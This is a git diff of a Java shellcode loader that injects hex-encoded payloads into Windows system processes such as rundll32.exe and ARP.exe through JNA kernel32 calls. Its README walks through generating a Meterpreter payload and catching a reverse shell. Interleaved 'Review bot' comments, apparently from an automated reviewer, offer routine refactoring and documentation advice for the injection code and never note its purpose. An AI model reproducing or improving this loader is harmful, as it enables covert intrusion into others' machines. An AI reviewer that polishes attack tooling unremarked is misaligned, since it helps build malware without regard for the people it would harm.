diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..4544264
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,33 @@
+# Compiled class file
+*.class
+
+# Eclipse
+.project
+.classpath
+.settings/
+
+# Intellij
+*.ipr
+*.iml
+*.iws
+.idea/
+.vscode/
+
+# Maven
+target/
+
+# Gradle
+build
+.gradle
+
+# Log file
+*.log
+log/
+
+# out
+**/out/
+
+# Mac
+.DS_Store
+
+temp/
\ No newline at end of file
diff --git a/README.md b/README.md
index 8e8ae23..f05406e 100644
--- a/README.md
+++ b/README.md
@@ -10,9 +10,7 @@
## 编译
-当前版本使用的jna经过魔改,不支持maven编译。
-
-需要使用idea的构建工件功能进行打包,具体方法请咨询百度。
+maven package
## 使用
@@ -42,7 +40,7 @@ java -jar ShellcodeLoader.jar --x64 shellcode_hex
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of hex file: 708 bytes
-fce88f0000006089e531d2648b5xxxx
+fce88f0000006089e531d2648b5....
```
然后开启监听
@@ -59,7 +57,7 @@ exploit -j
### 客户端
```
-java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5xxxx
+java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5....
```
即可收到反弹的Meterpreter
diff --git a/pom.xml b/pom.xml
index fda7eef..67f48ed 100644
--- a/pom.xml
+++ b/pom.xml
@@ -28,7 +28,13 @@
-
+
+ net.java.dev.jna
+ jna-platform
+ 1.2.0
+ system
+ ${project.basedir}/lib/tinyjna.jar
+
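Review bot: The jna-platform dependency is declared with `system` scope and a `systemPath` of `${project.basedir}/lib/tinyjna.jar`, a jar checked into the repository with no recorded origin, upstream version or checksum (the README describes it as a modified jna), so the build cannot be reproduced or verified from sources. Maven has deprecated system scope and warns on it; the usual replacement is to install the artifact into a repository (or a project-local file-based repository) under a real coordinate and record its digest alongside. If the jar must stay vendored, at least add a comment beside the dependency that names where it came from and what was changed, e.g. `<!-- lib/tinyjna.jar: derived from JNA [upstream version] with [patch description]; sha256 [digest of lib/tinyjna.jar] -->` with the bracketed placeholders filled in. The declared `1.2.0` version also does not correspond to any published jna-platform release I can confirm, so it should be documented as a local label rather than an upstream version.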
@@ -60,9 +66,9 @@
asexploits.ShellcodeLoader
-
- jar-with-dependencies
-
+
+ src/main/resources/assembly.xml
+
diff --git a/src/main/java/asexploits/ShellcodeLoader.java b/src/main/java/asexploits/ShellcodeLoader.java
index a4eed6b..2e48247 100644
--- a/src/main/java/asexploits/ShellcodeLoader.java
+++ b/src/main/java/asexploits/ShellcodeLoader.java
@@ -12,13 +12,14 @@
import com.sun.jna.win32.StdCallLibrary;
import com.sun.jna.win32.W32APIOptions;
+import java.io.File;
import java.util.Random;
public class ShellcodeLoader {
static Kernel32 kernel32;
static IKernel32 iKernel32;
- public static String[] ProcessArrayx32 = {"C:\\Windows\\SysWOW64\\ARP.exe", "C:\\Windows\\SysWOW64\\at.exe", "C:\\Windows\\SysWOW64\\auditpol.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\bootcfg.exe", "C:\\Windows\\SysWOW64\\ByteCodeGenerator.exe", "C:\\Windows\\SysWOW64\\cacls.exe", "C:\\Windows\\SysWOW64\\chcp.com", "C:\\Windows\\SysWOW64\\CheckNetIsolation.exe", "C:\\Windows\\SysWOW64\\chkdsk.exe", "C:\\Windows\\SysWOW64\\choice.exe", "C:\\Windows\\SysWOW64\\cmdkey.exe", "C:\\Windows\\SysWOW64\\comp.exe", "C:\\Windows\\SysWOW64\\diskcomp.com", "C:\\Windows\\SysWOW64\\Dism.exe", "C:\\Windows\\SysWOW64\\esentutl.exe", "C:\\Windows\\SysWOW64\\expand.exe", "C:\\Windows\\SysWOW64\\fc.exe", "C:\\Windows\\SysWOW64\\find.exe", "C:\\Windows\\SysWOW64\\gpresult.exe"};
- public static String[] ProcessArrayx64 = {"C:\\Windows\\System32\\rundll32.exe", "C:\\Windows\\System32\\find.exe", "C:\\Windows\\System32\\notepad.exe", "C:\\Windows\\System32\\ARP.EXE"};
+ public static String[] ProcessArrayx32 = {"C:\\Windows\\SysWOW64\\ARP.exe", "C:\\Windows\\SysWOW64\\at.exe", "C:\\Windows\\SysWOW64\\auditpol.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\bootcfg.exe", "C:\\Windows\\SysWOW64\\ByteCodeGenerator.exe", "C:\\Windows\\SysWOW64\\cacls.exe", "C:\\Windows\\SysWOW64\\CheckNetIsolation.exe", "C:\\Windows\\SysWOW64\\chkdsk.exe", "C:\\Windows\\SysWOW64\\choice.exe", "C:\\Windows\\SysWOW64\\cmdkey.exe", "C:\\Windows\\SysWOW64\\comp.exe", "C:\\Windows\\SysWOW64\\Dism.exe", "C:\\Windows\\SysWOW64\\esentutl.exe", "C:\\Windows\\SysWOW64\\expand.exe", "C:\\Windows\\SysWOW64\\fc.exe", "C:\\Windows\\SysWOW64\\find.exe", "C:\\Windows\\SysWOW64\\gpresult.exe"};
+ public static String[] ProcessArrayx64 = {"C:\\Windows\\System32\\rundll32.exe", "C:\\Windows\\System32\\find.exe", "C:\\Windows\\System32\\fc.exe", "C:\\Windows\\System32\\ARP.EXE", "C:\\Windows\\System32\\expand.exe"};
static {
kernel32 = (Kernel32) Native.loadLibrary(Kernel32.class, W32APIOptions.UNICODE_OPTIONS);
@@ -53,24 +54,57 @@ public static void main(String[] args) {
jnaLoader.loadShellCode(shellcode, is64);
}
+ public void loadShellCode(String shellcodeHex) {
+ this.loadShellCode(shellcodeHex, false);
+ }
+
public void loadShellCode(String shellcodeHex, boolean is64) {
String[] targetProcessArray = null;
+ //打乱数组顺序
+ shuffleArray(ProcessArrayx64);
+ shuffleArray(ProcessArrayx32);
// java是64位且选择注入64位shellcode
if (System.getProperty("sun.arch.data.model").equals("64") && is64) {
- targetProcessArray = ProcessArrayx64;
+ targetProcessArray = mergeArrays(ProcessArrayx64, ProcessArrayx32);
} else { //默认注入32位进程
- targetProcessArray = ProcessArrayx32;
+ targetProcessArray = mergeArrays(ProcessArrayx32, ProcessArrayx64);
+ }
+ String targetProcess = null;
+ for (int i = 0; i < targetProcessArray.length; i++) {
+ targetProcess = targetProcessArray[i];
+ if (new File(targetProcess).exists()) {
+ break;
+ }
}
- int j = targetProcessArray.length;
- byte b = 0;
- Random random = new Random();
- int k = b + random.nextInt(j);
- String targetProcess = targetProcessArray[k];
this.loadShellCode(shellcodeHex, targetProcess);
}
+ public static void shuffleArray(String[] arr) {
+ Random rand = new Random();
+ for (int i = arr.length - 1; i > 0; i--) {
+ int index = rand.nextInt(i + 1);
+ String temp = arr[i];
+ arr[i] = arr[index];
+ arr[index] = temp;
+ }
+ }
+
+ public static String[] mergeArrays(String[] a, String[] b) {
+ String[] c = new String[a.length + b.length];
+ int i = 0;
+ for (String s : a) {
+ c[i] = s;
+ i++;
+ }
+ for (String s : b) {
+ c[i] = s;
+ i++;
+ }
+ return c;
+ }
+
public void loadShellCode(String shellcodeHex, String targetProcess) {
System.out.println("targetProcess: " + targetProcess);
byte[] shellcode = hexStrToByteArray(shellcodeHex);
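Review bot: `shuffleArray(ProcessArrayx64)` and `shuffleArray(ProcessArrayx32)` reorder the `public static` arrays in place on every call, so the field contents seen by any other code change as a side effect of `loadShellCode(String, boolean)`; shuffle a copy and make the fields `private static final` (or `List.of(...)`) instead. Both new helpers re-implement the standard library: `Collections.shuffle(Arrays.asList(copy))` replaces `shuffleArray`, and `Stream.concat(Arrays.stream(a), Arrays.stream(b)).toArray(String[]::new)` (or `System.arraycopy`) replaces `mergeArrays`. A fresh `new Random()` is also created on every call to `shuffleArray`; hold a single instance as a field. The candidate loop leaves `targetProcess` pointing at the last entry when none of the paths exists, so the method continues silently rather than reporting that no candidate was found; a null check after the loop with an explicit exception or log message would make that failure visible. Neither helper has a Javadoc comment; a one-line summary on each (`/** Returns a new array holding the elements of a followed by b. */`) would suffice.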
diff --git a/src/main/resources/assembly.xml b/src/main/resources/assembly.xml
new file mode 100644
index 0000000..0345be0
--- /dev/null
+++ b/src/main/resources/assembly.xml
@@ -0,0 +1,27 @@
+
+
+ jar-with-dependencies
+
+
+ jar
+
+
+ false
+
+
+
+ /
+ true
+ true
+ runtime
+
+
+
+
+ /
+ true
+ true
+ system
+
+
+
\ No newline at end of file